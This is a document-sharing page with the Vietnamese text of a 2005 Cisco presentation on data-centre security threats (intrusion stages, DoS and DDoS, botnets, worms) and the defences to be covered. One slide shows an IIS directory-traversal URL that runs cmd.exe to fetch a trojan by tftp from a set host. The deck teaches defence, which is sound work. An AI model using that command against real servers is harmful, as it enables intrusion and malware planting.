An ninh, an tòan cho trung tâm dữ liệu - SERVER FARM

Chia sẻ: Orchid Orchid | Ngày: | Loại File: PDF | Số trang:0

0
323
lượt xem
176
download

An ninh, an tòan cho trung tâm dữ liệu - SERVER FARM

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Nếu TCP SYN yêu cầu server cấp phát bộ nhớ và sau đó tổng giá trị bộ nhớ có thể sẽ trở thành nguồn xác định để có thể là DoS’ed. Server TCP sẽ giữ SYN trong trạng thái SYN_RCVD cho đến khi quá hạn. Nhiều SYNs mở nhiều chờ đợi SYN_RCVD Không có gì cần để bị lừa

Chủ đề:
Lưu

Nội dung Text: An ninh, an tòan cho trung tâm dữ liệu - SERVER FARM

  1. An ninh, an tòan cho trung tâm dữ liệu SERVER FARM TERRY SEETO GIÁM ĐỐC GIẢI PHÁP DOANH NGHIỆP CISCO CHÂU Á THÁI BÌNH DƯƠNG CCIE #3119 © 2005 Cisco Systems, Inc. All rights reserved. 1
  2. Lịch trình • Các nguy cơ về an ninh đối với trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu • Thiết kế trung tâm dữ liệu © 2005 Cisco Systems, Inc. All rights reserved. 2
  3. Cisco đã sẵn sàng với trung tâm dữ liệu Network Topology và cách thức hướng tới trung tâm dữ liệu DC… An ninh SERVER FARM NETWORK Catalyst Mạng truy nhập trung tâm NAS File, Content DDOS Guard Firewall Services Caches EMC Intrusion Server Internet dữ liệu Prevention Load Balancing Các thiết bị đi theo mạng MPLS VPN IPSEC/SSL VPN SSL Off-load SSL/IPSec VPN GE, 10GE INTEGRATED NETWORK SERVICES Nhân viên /đối tác /khách hàng GE, 10GE GE, 10GE Multiprotocoll Gateway Services Mạng doanh nghiệp Mạng ma trận máy chủ Clustering Grid/Utility Computing Server Virtualization V Infiniband RDMA độ trễ thấp Virtual I/O Các dịch vụ ảo tích hợp SFS 7000 SFS 7000 Virtual Server Clusters Blade, UNIX/NT Đáu nối liên kết trung Servers, tâm dữ liệu Mainframes GE FC FC, FICON, ISCSI Mạng vùng lưu trữ FC, FICON, FCIP SONET/SDH xWDM Storage Ma trân ảos Metro Ethernet Virtualization FCIP (VSANs) ONS 15000 Dịch vụ định tuyến Data Replication ma trậns Services FC, FICON SECONDARY DATA CENTER Các dịch vụ lưu trữ tích hợp MDS 9500 Storage & Tape Arrays © 2005 Cisco Systems, Inc. All rights reserved. Các nguồn lưu trữs 3
  4. Các nguy cơ an ninh trung tâm dữ liệu © 2005 Cisco Systems, Inc. All rights reserved. 4
  5. Các nguy cơ an ninh trung tâm dữ liệu Các nguy cơ can thiệp trái phép Các nguy cơ từ chối dịch vụ Các nguy cơ về sâu © 2005 Cisco Systems, Inc. All rights reserved. 5
  6. Trình tự can thiệp trái phép điển hình Phase 1: Hacking vào Server của Web và ứng dụng Phân đoạn lớp 2 Phân đoạn lớp 2 HTTP Web Server Web Server Database Web/application • Sau bước probing/scanning, kể xâm nhập (hacker) phát hiện điểm yếu của server web/ứng dụng • Hacker khai thác điểm yếu để lấy shell • Ví dụ: copy virus trojan vào server web/ứng dụng: HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe? /c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe © 2005 Cisco Systems, Inc. All rights reserved. 6
  7. Trình tự can thiệp trái phép điển hình Phase 2 – Các chiến lược STRATEGY 1: ACCESSING THE DATABASE • The hacker looks for the Database server, and if the web/application servers are layer 2 adjacent (with dual NICs for example) this is extremely easy • Use a command line scanner • Identify the vulnerabilities of the DB server • Then obtain the shell of the database server and dump the database information STRATEGY 2: SNIFFING THE TRAFFIC © 2005 Cisco Systems, Inc. All rights reserved. 7
  8. CÁC NGUY CƠ TỪ CHỐI DỊCH VỤ © 2005 Cisco Systems, Inc. All rights reserved. 8
  9. Các mục tiêu tấn công DoS • Mục tiêu tấn công DoS là làm cho các ứng dụng không phù hợp nữa • Phương thức này có thể nhằm đến: mbehring Máy chủ Server Thiết bị mạng Đường liên kết mạng • Có thể được kết hợp với: Nhái lại địa chỉ nguồn IP • Các hiểm nguy đi cùng bao gồm: Các bảng trạng thái Băng thông Bão hòa các bảng chuyển tiếp Các máy chủ mạng © 2005 Cisco Systems, Inc. All rights reserved. 9
  10. Các tấn công DoS thông thường • Tính dễ tổn thương của giao thức • Ngập lụt các gói ICMP, UDP, SYN • Ánh xạ ICMP, UDP Broadcast Amplification TCP SYN DNS • Các đấu nối đã được thiết lập TCP Connects HTTP Gets © 2005 Cisco Systems, Inc. All rights reserved. 10
  11. Từ chối dịch vụ đã phân bố Các nạn nhân Zombies Các thiết bị của khách hàng: Server/FW/Switch/router Hacker Nạn ống bị ngập lụt nhân router biên ISP (web server) Phần mềm DOS thông dụng Masters Điều khiển lưu lượng Lưu lượng tấn công © 2005 Cisco Systems, Inc. All rights reserved. 11
  12. Botnet • Dự báo có hơn triệu máy tính bị lây nhiểm qua 6,000 các máy botnets • Botnets quan trắc hơn 100,000 hosts triển khai trải rộng qua các servers IRC • Used for DDOS, SPAM, network mapping, password sniffing, identity / info theft, pay per click ad abuse, malware proliferation, etc. • Kể cả chỉ với 1000 máy botnet có thể chiếm hữu hầu hết đường truyền Internet 128 kbps * 1000 > 100 mbps The Honeynet Project and Research Alliance, March 13, 2005 © 2005 Cisco Systems, Inc. All rights reserved. 12
  13. Hàng giờ lại có thêm máy bị lây nhiễm • Trung bình có 170,000 new bots/ngày http://www.ciphertrust.com/resources/statistics/zombie.php © 2005 Cisco Systems, Inc. All rights reserved. 13
  14. CÁC NGUY CƠ – SÂU (WORMS) © 2005 Cisco Systems, Inc. All rights reserved. 14
  15. Các sâu gần đây sadmind Code /IIS Red Nimda Slapper Slammer Blaster MyDoom.c Sasser 5/01 7/01 9/01 9/02 1/03 8/03 1/04 5/04 “Sự tích hợp và tự động hóa của tất cả các khía cạnh can thiệp trái phép: quét do thám, xác định mục tiêu, thỏa hiệp, gắn và điều khiển tấn công ” Dave Dittrich, 2004 © 2005 Cisco Systems, Inc. All rights reserved. 15
  16. Sâu lan truyền bằng cách nào? • Khai thác mạng và điểm yếu • Cửa sổ sau (Backdoors) • Từ khóa (mật khẩu) kém hoặc để ở chế độ mặc định • Chia se file Windows • Các trang Web đen • E-mail • Các kênh IRC • Instant Messaging • Peer-to-peer • Newsgroups • Tất cả hoặc bất kỳ trong những điều kể trên © 2005 Cisco Systems, Inc. All rights reserved. 16
  17. Các ảnh hưởng của sâu • Tai nạn DoS Slammer • Các cái khác • DDoS được tự động Các máy chủ chuyển tiếp CodeRed1, Blaster Sniffers (passwords, botnet theft) • Botnets DDOS tương lai Phá hủy, làm gián đoạn và ăn trộm dữ liệu Slapper, Phatbot Phá hủy phần cứng • Backdoor servers Thay đổi nối dung trang Web Qaz, CodeRed_II, Nimda Sửa chữa sâu • Keyloggers Bugbear • “Supercomputer” Networks Opaserv © 2005 Cisco Systems, Inc. All rights reserved. 17
  18. Lịch trình • Các nguy cơ an ninh trung tâm dữ liệu • Kỹ thuật an ninh trung tâm dữ liệu • Thiết kế an ninh cho trung tâm dữ liệu © 2005 Cisco Systems, Inc. All rights reserved. 18
  19. Các kỹ thuật anh ninh trung tâm dữ liệu Phát hiện và phòng chống xâm nhập trái phép Phát hiện và giảm Phát hiện và giảm thiểu DOS thiểu sâu © 2005 Cisco Systems, Inc. All rights reserved. 19
  20. Phát hiện và phòng chống xâm nhập trái phép © 2005 Cisco Systems, Inc. All rights reserved. 20

CÓ THỂ BẠN MUỐN DOWNLOAD

Đồng bộ tài khoản